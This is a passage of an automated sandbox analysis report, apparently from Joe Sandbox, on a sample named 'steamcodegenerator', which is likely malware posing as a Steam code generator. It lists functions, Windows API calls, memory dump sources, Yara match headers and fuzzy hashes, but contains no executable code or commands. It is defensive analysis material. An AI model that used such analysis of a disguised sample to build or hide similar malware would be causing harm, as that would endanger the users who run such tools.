                                                                                                                            • Part of subcall function 00007FF71C06A298: SetLastError.KERNEL32 ref: 00007FF71C06A347
                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF71C0745E3,?,00000000,00000092,?,?,00000000,?,00007FF71C066B25), ref: 00007FF71C073F86
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3029459697-0
                                                                                                                          • Opcode ID: 34d94b69e6205fce2f74fcc9f7c432e85abed7b203d1d4e603842b48bd0e59d7
                                                                                                                          • Instruction ID: f8319475ae5ba7bd5b310358629f4f26a273bbc1f587409659d064237440fbe0
                                                                                                                          • Opcode Fuzzy Hash: 34d94b69e6205fce2f74fcc9f7c432e85abed7b203d1d4e603842b48bd0e59d7
                                                                                                                          • Instruction Fuzzy Hash: F401DB61E0875145E7146B55E8427F9B3A1EB50FB0F958231D669432C4CF6994858710
                                                                                                                          APIs
                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF71C06B7C7,?,?,?,?,?,?,?,?,00000000,00007FF71C073488), ref: 00007FF71C06B3C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumLocalesSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099609381-0
                                                                                                                          • Opcode ID: cff3fbf4e0a8c1f2ed818e2cbe172fd1e753f0025c3aa3cb7564e8ccb7c4537e
                                                                                                                          • Instruction ID: 6019f5d10811421d47777d4b78ce0dbe8c5bd8645ff922d0e29942f178dc0400
                                                                                                                          • Opcode Fuzzy Hash: cff3fbf4e0a8c1f2ed818e2cbe172fd1e753f0025c3aa3cb7564e8ccb7c4537e
                                                                                                                          • Instruction Fuzzy Hash: 88F04B71B08E4582E704EB99FD811E9B3A1EB98B90FA48035DA5D93364CF2CD4598700
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 00007FF71C06F0AD
                                                                                                                            • Part of subcall function 00007FF71C068A7C: HeapAlloc.KERNEL32(?,?,00000000,00007FF71C06A472,?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000), ref: 00007FF71C068AD1
                                                                                                                            • Part of subcall function 00007FF71C068AF4: HeapFree.KERNEL32(?,?,00007FF71C067CF3,00007FF71C0728CA,?,?,?,00007FF71C072C47,?,?,00000000,00007FF71C073185,?,?,?,00007FF71C0730B7), ref: 00007FF71C068B0A
                                                                                                                            • Part of subcall function 00007FF71C068AF4: GetLastError.KERNEL32(?,?,00007FF71C067CF3,00007FF71C0728CA,?,?,?,00007FF71C072C47,?,?,00000000,00007FF71C073185,?,?,?,00007FF71C0730B7), ref: 00007FF71C068B14
                                                                                                                            • Part of subcall function 00007FF71C07641C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71C07644F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 916656526-0
                                                                                                                          • Opcode ID: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                                                                          • Instruction ID: 337f75a3307fe78eae65bea66001b5c523bcf6b2943861741cfc3f336bb797b6
                                                                                                                          • Opcode Fuzzy Hash: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                                                                          • Instruction Fuzzy Hash: 7541C421B09B5642F660AEA6AC117FEF2906F45BE0FE44539DE4D4B785EF3CE4088620
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 54951025-0
                                                                                                                          • Opcode ID: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
                                                                                                                          • Instruction ID: 8977439996027e0991757d0f92b66574c4f923cb00694b152dbb742a2a910f24
                                                                                                                          • Opcode Fuzzy Hash: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
                                                                                                                          • Instruction Fuzzy Hash: 92B09224E07F46C2EA48BB916C8726462A4BF48720FE98038C29C51320EF6C24A98720
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
                                                                                                                          • Instruction ID: 3a44af4c75a296bca1b85304dce611d8b1ed9ff1a1a8e989952074b63e7e7e4f
                                                                                                                          • Opcode Fuzzy Hash: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
                                                                                                                          • Instruction Fuzzy Hash: E6E17571618B498BEB6CDF28C8497AEB7E5FB58701F11422DE84AC3251DF30E955CB81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                                                                          • Instruction ID: 5b5c7f2667a065f2a97ae7e37440f951cd14fadbfd7634b18976053cc08ddfce
                                                                                                                          • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                                                                          • Instruction Fuzzy Hash: 96D14071518B488FDB59DF28C889AEAB7E6FF94310F14462DE88AC7155DF30E981CB41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4023145424-0
                                                                                                                          • Opcode ID: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
                                                                                                                          • Instruction ID: 5cf2d0bb5e99a9985fbea191f3f7cd5ac0cea715fafe17db7b91b2751fddf054
                                                                                                                          • Opcode Fuzzy Hash: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
                                                                                                                          • Instruction Fuzzy Hash: 5AC1B362B08AA285EB60AFA1DC103FAB7A4FB947A8FE04035DE4D47695DF38D549C710
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
                                                                                                                          • Instruction ID: 6521bdb3f74e1cdea6e45563a17823d88c61b753314cbb8674d0eae167d69836
                                                                                                                          • Opcode Fuzzy Hash: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
                                                                                                                          • Instruction Fuzzy Hash: F2C1E722B08E6686EB28DFE588002BDB3A0EB05B68FB44235CE4D477D5CF39D459D760
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
                                                                                                                          • Instruction ID: 043777bd918bdd5d9ffdf27ec606d8811cfae87eebad80b1d45582ea0b49d935
                                                                                                                          • Opcode Fuzzy Hash: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
                                                                                                                          • Instruction Fuzzy Hash: C4A11F71508A4C8FDB55EF28C889BDAB7E9FB68315F10466EE44AC7161EB30E644CB81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1500699246-0
                                                                                                                          • Opcode ID: e2ffca55289955cad0152be945083cfc4f4c9dbb8a5636975514020bfa88af06
                                                                                                                          • Instruction ID: 5759ec8fbf7116bbce89c3ee7f837b270881695473d123aa0a7dad1c90fd399a
                                                                                                                          • Opcode Fuzzy Hash: e2ffca55289955cad0152be945083cfc4f4c9dbb8a5636975514020bfa88af06
                                                                                                                          • Instruction Fuzzy Hash: 66B10C62A08B4642F768BFA1D8136F9B391FB40FA4FA04135DA99436C5DF3CE559C360
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3215553584-0
                                                                                                                          • Opcode ID: beb85e8a86863ea0d2a3640763483ded5549c817e49d63ce28143ff9a2fe482d
                                                                                                                          • Instruction ID: 23103056b26722e292fbe5083e0d9690f803e2897b366dac28a8e1cfe3d63e64
                                                                                                                          • Opcode Fuzzy Hash: beb85e8a86863ea0d2a3640763483ded5549c817e49d63ce28143ff9a2fe482d
                                                                                                                          • Instruction Fuzzy Hash: BF81B272B04E2282EB64AEA5D8813BD7360FB44BA4FA04636EF5E57785CF38D1498310
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dd78b8a88bf6096c80a61e6aa1672cbc30d8af44914a7a383a5bb521698ea26c
                                                                                                                          • Instruction ID: 1fc84e4c0110251118fc2171bb04c3d0675e478dd11370258f1a209ad940c64e
                                                                                                                          • Opcode Fuzzy Hash: dd78b8a88bf6096c80a61e6aa1672cbc30d8af44914a7a383a5bb521698ea26c
                                                                                                                          • Instruction Fuzzy Hash: 8B51D572B0CAD149E664AF5998403FAF691FB457A4FA44235DA9E43F99DB3CE0048B20
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398854857.0000020C74771000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000020C74771000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74771000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
                                                                                                                          • Instruction ID: 2dcbde4afc440015ca1b494394d7f02b3c6d10a89deb488578193015c65ea515
                                                                                                                          • Opcode Fuzzy Hash: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
                                                                                                                          • Instruction Fuzzy Hash: 9E418D317145058BEB0CCF2DD895A65B3E6FB99304F58C7BDE54BCB297DA319802CA44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                          • Instruction ID: 151b1ca9802bcb952961fcfcbb286d46df8c17440cd0808d531221cb2ab24f2c
                                                                                                                          • Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                          • Instruction Fuzzy Hash: 61518032B58E6186F724DF69C8402A8B7B0EB45F6CF748131CA8D1B795CB3AE846C754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                                                                          • Instruction ID: 0c86ab750a096dba397c510b7d68c3e45b704121e42a942b85c9f7c9cc95b0e0
                                                                                                                          • Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                                                                          • Instruction Fuzzy Hash: 9A519436B58A7286E764DF69C4402ACB7B4EB44B6CFB44131CE4C17798CB3AE84AC754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                          • Instruction ID: 224ba80af14bf1c745db84a541c3482d96419601289a02affe4f78a1aae528cf
                                                                                                                          • Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                          • Instruction Fuzzy Hash: A151BF72B58A6186E724DF68C4402A9B7B0EB44B6CFB48131CE8D07795CF3AEC46C754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 485612231-0
                                                                                                                          • Opcode ID: a2c328ef171a7afa6c06a3296587a9b3e14f038aec87a28e036cef878b6331d9
                                                                                                                          • Instruction ID: cd92af0f151b4680565abe009adf300b5119910e25e585cd13d4bb23b0a6f952
                                                                                                                          • Opcode Fuzzy Hash: a2c328ef171a7afa6c06a3296587a9b3e14f038aec87a28e036cef878b6331d9
                                                                                                                          • Instruction Fuzzy Hash: 0741E462714E5581EF48DFAADD151A9B3A1FB48FE4BA99032DE0D97B58DF3CD0458300
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d23d0e9da3076ad5b774ad45d8636280020e110bd3dbb24153443ce06125473
                                                                                                                          • Instruction ID: e96dee6f0413b6be3e4e0279c33bec210d198eaa40433303b9e70a94d3f70aaa
                                                                                                                          • Opcode Fuzzy Hash: 1d23d0e9da3076ad5b774ad45d8636280020e110bd3dbb24153443ce06125473
                                                                                                                          • Instruction Fuzzy Hash: 6BF0C271B18A918ADBA89F68A883669B7E0F709390F90C439D68D83F04C73C9460CF14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c20acefe3a69058f9053b966004725b6699a124ed001c4cc8db5546ddce4a23b
                                                                                                                          • Instruction ID: de38aa6ba6667d631a131f355c55fe45009280074621fb8b9231f6ad06100650
                                                                                                                          • Opcode Fuzzy Hash: c20acefe3a69058f9053b966004725b6699a124ed001c4cc8db5546ddce4a23b
                                                                                                                          • Instruction Fuzzy Hash: B9A00125918E52D1FB48AB80AD690B0A631AB51320BA00131D65D424A19F2CA449D668
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                          • API String ID: 459529453-1866435925
                                                                                                                          • Opcode ID: 3937cb2de45063989f30ed65fb080d1dae6c25b6e2d9b3e18489dfea4281ca75
                                                                                                                          • Instruction ID: 214820b9d7058eb571e25606f18b54caba4a1cf10084453f95629af9bcc518de
                                                                                                                          • Opcode Fuzzy Hash: 3937cb2de45063989f30ed65fb080d1dae6c25b6e2d9b3e18489dfea4281ca75
                                                                                                                          • Instruction Fuzzy Hash: F7B18C22A09E8186EA14EB95E8813F9A3B0FF85BA4FA58136EB5D03755DF3CD449C710
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
